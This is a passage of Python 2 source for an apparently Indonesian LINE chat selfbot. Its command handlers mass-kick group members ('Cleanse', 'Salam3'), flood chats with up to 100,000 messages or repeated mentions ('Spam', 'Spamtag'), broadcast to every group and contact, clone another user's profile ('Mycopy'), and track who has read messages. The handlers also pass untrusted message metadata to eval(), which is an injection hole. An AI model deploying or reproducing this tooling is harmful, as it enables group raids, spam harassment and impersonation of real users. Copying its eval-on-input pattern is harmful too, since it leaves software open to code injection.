kr.sendText(msg.to,"noтιғ yg joιn on")
else:
wait["Wc"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"already on")
elif msg.text in ["Datang off","datang off"]:
if wait["Wc"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"noтιғ yg joιn oғғ")
else:
wait["Wc"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"already oғғ")
#==============================================================================#
elif msg.text in ["Pamit on","pamit on"]:
if wait["Lv"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"noтιғ yg leave on")
else:
wait["Lv"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"already on")
elif msg.text in ["Pamit off","pamit off"]:
if wait["Lv"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"noтιғ yg leave oғғ")
else:
wait["Lv"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"already oғғ")
#==============================================================================#
elif "Cleanse" in msg.text:
if msg.toType == 2:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Cleanse","")
gs = kr.getGroup(msg.to)
gs = kr.getGroup(msg.to)
gs = kr.getGroup(msg.to)
kr.sendText(msg.to,"Just some casual cleansing ô")
kr.sendText(msg.to,"Group cleansed.")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Not found.")
kr.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
klist=[kr,kr,kr]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
kr.sendText(msg.to,"Group cleanse")
kr.sendText(msg.to,"Group cleanse")
elif msg.text in ["Salam1"]:
kr.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr.sendText(msg.to,"Assalamu'alaikum")
elif msg.text in ["Salam2"]:
kr.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
elif "Salam3" in msg.text:
if msg.from_ in admin:
kr.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr.sendText(msg.to,"Assalamu'alaikum")
kr.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kr.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Salam3","")
gs = kr.getGroup(msg.to)
kr.sendText(msg.to,"maaf kalo gak sopan")
kr.sendText(msg.to,"Qo salamnya gak ada yang jawab ya..!!")
kr.sendText(msg.to,"hehehhehe")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in admin:
try:
klist=[kr]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
kr.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kr.sendText(msg.to,"Nah salamnya jawab sendiri dah")
elif ("Kick " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kr.kickoutFromGroup(msg.to,[target])
except:
kr.sendText(msg.to,"Error")
elif ("Cipok " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kr.kickoutFromGroup(msg.to,[target])
kr.inviteIntoGroup(msg.to,[target])
kr.cancelGroupInvitation(msg.to,[target])
except:
kr.sendText(msg.to,"Error")
elif "Kick: " in msg.text:
midd = msg.text.replace("Kick: ","")
kr.kickoutFromGroup(msg.to,[midd])
elif 'invite ' in msg.text.lower():
key = msg.text[-33:]
kr.findAndAddContactsByMid(key)
kr.inviteIntoGroup(msg.to, [key])
contact = kr.getContact(key)
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = kr.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
kr.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Tidak ada undangan")
else:
kr.sendText(msg.to,"Invitan tidak ada")
else:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Tidak ada undangan")
else:
kr.sendText(msg.to,"Invitan tidak ada")
elif msg.text.lower() == 'link on':
if msg.toType == 2:
group = kr.getGroup(msg.to)
group.preventJoinByTicket = False
kr.updateGroup(group)
if wait["lang"] == "JP":
kr.sendText(msg.to,"URL open")
else:
kr.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
kr.sendText(msg.to,"It can not be used outside the group")
else:
kr.sendText(msg.to,"Can not be used for groups other than")
elif msg.text.lower() == 'link off':
if msg.toType == 2:
group = kr.getGroup(msg.to)
group.preventJoinByTicket = True
kr.updateGroup(group)
if wait["lang"] == "JP":
kr.sendText(msg.to,"URL close")
else:
kr.sendText(msg.to,"URL close")
else:
if wait["lang"] == "JP":
kr.sendText(msg.to,"It can not be used outside the group")
else:
kr.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["Url","Gurl"]:
if msg.toType == 2:
g = kr.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
kr.updateGroup(g)
gurl = kr.reissueGroupTicket(msg.to)
kr.sendText(msg.to,"line://ti/g/" + gurl)
elif "Gcreator" == msg.text:
try:
group = kr.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
kr.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
kr.sendMessage(M)
kr.sendText(msg.to,"Creator Grup")
elif msg.text.lower() == 'invite:gcreator':
if msg.toType == 2:
ginfo = kr.getGroup(msg.to)
try:
gcmid = ginfo.creator.mid
except:
gcmid = "Error"
if wait["lang"] == "JP":
kr.inviteIntoGroup(msg.to,[gcmid])
else:
kr.inviteIntoGroup(msg.to,[gcmid])
elif ("Gname: " in msg.text):
if msg.toType == 2:
X = kr.getGroup(msg.to)
X.name = msg.text.replace("Gname: ","")
kr.updateGroup(X)
elif msg.text.lower() == 'infogrup':
group = kr.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr.sendText(msg.to,md)
elif msg.text.lower() == 'grup id':
gid = kr.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (kr.getGroup(i).name,i)
kr.sendText(msg.to,h)
#==============================================================================#
elif msg.text in ["Glist"]:
gid = kr.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (kr.getGroup(i).name +" ? ["+str(len(kr.getGroup(i).members))+"]")
kr.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif msg.text.lower() == 'gcancel':
gid = kr.getGroupIdsInvited()
for i in gid:
kr.rejectGroupInvitation(i)
if wait["lang"] == "JP":
kr.sendText(msg.to,"Aku menolak semua undangan")
else:
kr.sendText(msg.to,"He declined all invitations")
elif "Auto add" in msg.text:
thisgroup = kr.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
kr.findAndAddContactsByMids(mi_d)
kr.sendText(msg.to,"Success Add all")
elif "@bye" in msg.text:
if msg.toType == 2:
ginfo = kr.getGroup(msg.to)
try:
kr.leaveGroup(msg.to)
except:
pass
#==============================================================================#
elif "Sun" == msg.text.lower():
group = kr.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "Jumlah:\n" + str(jml) + " Members"
cnt.to = msg.to
kr.sendMessage(cnt)
elif "Sider on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
kr.sendText(msg.to,"Setpoint already on")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
kr.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "Sider off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
kr.sendText(msg.to,"Setpoint already off")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
kr.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif msg.text in ["Ciduk","Nahloh"]:
if msg.toType == 2:
print "\nRead aktif..."
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
kr.sendText(msg.to, "╔═════════════ \n╠Sider :\n╠═════════════ %s\n╠\n╠═════════════\n╠Reader :\n╠═════════════ %s\n╠\n╠═════════════\n╠In the last seen point:\n╠[%s]\n╚═════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "\nReading Point Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "Ciduk ready"
kr.sendText(msg.to, "Auto Read Point!!" + (wait2['setTime'][msg.to]))
else:
kr.sendText(msg.to, "Ketik [Cctv on] dulu, baru ketik [Toong]")
elif "intip" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
kr.sendText(msg.to, "Reader:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = kr.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = ''
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nBefore: %s\nAfter: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
kr.sendMessage(msg)
except Exception as error:
print error
pass
else:
kr.sendText(msg.to, "Lurking has not been set.")
elif "Gbroadcast: " in msg.text:
bc = msg.text.replace("Gbroadcast: ","")
gid = kr.getGroupIdsJoined()
for i in gid:
kr.sendText(i, bc)
elif "Cbroadcast: " in msg.text:
bc = msg.text.replace("Cbroadcast: ","")
gid = kr.getAllContactIds()
for i in gid:
kr.sendText(i, bc)
elif "Spam change: " in msg.text:
wait["spam"] = msg.text.replace("Spam change: ","")
kr.sendText(msg.to,"spam changed")
elif "Spam add: " in msg.text:
wait["spam"] = msg.text.replace("Spam add: ","")
if wait["lang"] == "JP":
kr.sendText(msg.to,"spam changed")
else:
kr.sendText(msg.to,"Done")
elif "Spam: " in msg.text:
strnum = msg.text.replace("Spam: ","")
num = int(strnum)
for var in range(0,num):
kr.sendText(msg.to, wait["spam"])
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
else:
pass
elif "Spam" in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
kr.sendText(msg.to, teks)
else:
kr.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
kr.sendText(msg.to, tulisan)
else:
kr.sendText(msg.to, "Out Of Range!")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
kr.sendText(msg.to,"Target ditambahkan!")
break
except:
kr.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
kr.sendText(msg.to,"Target dihapuskan!")
break
except:
kr.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
kr.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "?? "+kr.getContact(mi_d).displayName + "\n"
kr.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
kr.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
kr.sendText(msg.to,"Mimic change to target")
else:
kr.sendText(msg.to,"I dont know")
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
kr.sendText(msg.to,"Reply Message on")
else:
kr.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
kr.sendText(msg.to,"Reply Message off")
else:
kr.sendText(msg.to,"Sudah off")
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
kr.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
kr.sendImageWithURL(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
kr.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
kr.sendVideoWithURL(msg.to,wait["pap"])
elif "TL:" in msg.text:
if msg.toType == 2:
tl_text = msg.text.replace("TL:","")
kr.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+kr.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#==============================================================================#
elif msg.text.lower() == 'mymid':
kr.sendText(msg.to,mid)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
kr.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+kr.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr.getProfile()
profile.displayName = string
kr.updateProfile(profile)
kr.sendText(msg.to,"Changed " + string + "")
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr.getProfile()
profile.statusMessage = string
kr.updateProfile(profile)
kr.sendText(msg.to,"Changed " + string)
elif msg.text in ["Myname"]:
h = kr.getContact(mid)
kr.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = kr.getContact(mid)
kr.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = kr.getContact(mid)
kr.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = kr.getContact(mid)
kr.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = kr.getContact(mid)
kr.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = kr.getContact(mid)
cu = kr.channel.getCover(mid)
path = str(cu)
kr.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = kr.getContact(mid)
cu = kr.channel.getCover(mid)
path = str(cu)
kr.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
kr.sendText(msg.to, g.mid)
else:
pass
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr.getContact(key1)
cu = kr.channel.getCover(key1)
try:
kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr.getContact(key1)
cu = kr.channel.getCover(key1)
try:
kr.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
kr.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr.getContact(key1)
cu = kr.channel.getCover(key1)
try:
kr.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
kr.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr.getContact(key1)
cu = kr.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr.sendText(msg.to,"Profile Picture " + contact.displayName)
kr.sendImageWithURL(msg.to,image)
kr.sendText(msg.to,"Cover " + contact.displayName)
kr.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = kr.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
kr.sendMessage(msg)
elif "Getpict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getpict @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
kr.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getvid @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
kr.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Picturl @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
kr.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
cu = kr.channel.getCover(target)
path = str(cu)
kr.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Coverurl @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
cu = kr.channel.getCover(target)
path = str(cu)
kr.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Getgrup image" in msg.text:
group = kr.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
kr.sendImageWithURL(msg.to,path)
elif "Urlgrup image" in msg.text:
group = kr.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
kr.sendText(msg.to,path)
elif "Mycopy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kr.CloneContactProfile(target)
kr.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Mybackup","mybackup"]:
try:
kr.updateDisplayPicture(backup.pictureStatus)
kr.updateProfile(backup)
kr.sendText(msg.to, "Refreshed.")
except Exception as e:
kr.sendText(msg.to, str(e))
#==============================================================================#
elif "Fancytext: " in msg.text:
txt = msg.text.replace("Fancytext: ", "")
kr.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Translate-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
kr.sendText(msg.to, A)
elif "Translate-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
kr.sendText(msg.to, A)
elif "Translate-ar" in msg.text:
isi = msg.text.replace("Tr-ar ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
A = A.encode('utf-8')
kr.sendText(msg.to, A)
elif "Translate-jp" in msg.text:
isi = msg.text.replace("Tr-jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
kr.sendText(msg.to, A)
elif "Translate-ko" in msg.text:
isi = msg.text.replace("Tr-ko ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
kr.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO ENGLISH**\n" + "" + result + "\n**SUKSES**")
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"**FROM EN**\n" + "" + kata + "\n**TO ID**\n" + "" + result + "\n**SUKSES**")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO JP**\n" + "" + result + "\n**SUKSES**")
elif "Jp@id" in msg.text:
bahasa_awal = 'ja'
bahasa_tujuan = 'id'
kata = msg.text.replace("Jp@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@th ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----")
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Th@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
